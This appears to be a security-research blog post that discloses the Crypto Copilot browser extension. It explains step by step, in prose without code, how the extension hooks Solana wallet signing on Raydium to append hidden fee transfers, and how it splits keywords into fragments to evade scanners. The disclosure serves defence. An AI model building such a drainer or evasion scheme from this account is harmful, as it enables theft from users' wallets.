A few weeks ago on November 19, Casmer Labs published a blog post exploring malicious browser extensions. In the article, we covered how malicious browser extensions manage to get listed in marketplaces as well as a few examples of specific pieces of malicious software. Before reading further, check out the article so you understand how the workflow generally operates.

How It Works

First reported on November 25 by Socket’s Threat Research Team is the Crypto Copilot browser extension, which was listed on the Chrome Store on June 28, 2025. The extension is advertised as a method to quickly execute Solana trades straight from the X (formerly Twitter) interface. As of the publication of this article, the extension is still available for download. The Casmer Labs team, as well as a number of other threat laboratories, have submitted requests for the extension to be de-listed.

Let’s take a look at how the extension works:

1. The attack begins when the user navigates to raydium.io, which uses the chrome.scripting.executeScript API to inject a JavaScript payload into the main world of the Raydium web application.
2. This injected script wraps the global window.solana provider object. The malware sets up event listeners on the signTransaction and signAndSendTransaction methods of the aforementioned object.
3. When the user executed a swap, the Raydium frontend constructs a VersionedTransaction or Transaction object, which contains the following instructions:
   • Create Associated Token Account (if needed)
   • The Raydium Swap Instruction, which is the core logic
   • Close Account (optional)
4. The Raydium frontend calls window.solana.signAndSendTransaction(transaction)
5. Because the malware has hooked this method, the call is captured initially by the Crypto Copilot extension.
6. The malware deserializes the transaction instructions and applies the following logic:
   • If the trade value is below 2.6SOL (~$330 USD), the stolen amount is a flat 0.0013 SOL
   • If the trade value is above 2.6SOL, 0.05% of the amount will be stolen
7. The malware generates a new Solana instruction using the SystemProgram.transfer method with the following parameters:
   • From: User_Wallet_Address, which is extracted from the transaction
   • To: Attacker_Wallet_Address
   • Lamports: The calculated fee
8. The above Solana instruction is appended and re-serialized.
9. The user “Approves” the transfer, which is bundled with the legitimate swap.

Further investigation into the browser extension shows that the malicious code is heavily obfuscated, with some of the techniques including breaking out keywords such as transfer, SystemProgram, and solana into "Sys" + "tem" + "Pro" + "gram", avoiding generic RegEx-based keyword searches during automated scanning processes.

Why It Matters and Conclusion

Malicious browser extensions are nothing new- but the Crypto Copilot campaign is proof that attackers’ innovation isn’t slowing down anytime soon. Google’s Manifest 3 (MV3) architecture, which was implemented and made mandatory for all new extensions in June 2024, introduced stricter limits on remotely hosted code. Generally being the most popular method for attackers to use, many have had to obfuscate malicious functionality within submitted code, risking detection during the submission and review process. As always, attackers have, and always will, adapt to emerging regulations that are designed to stop or slow them down.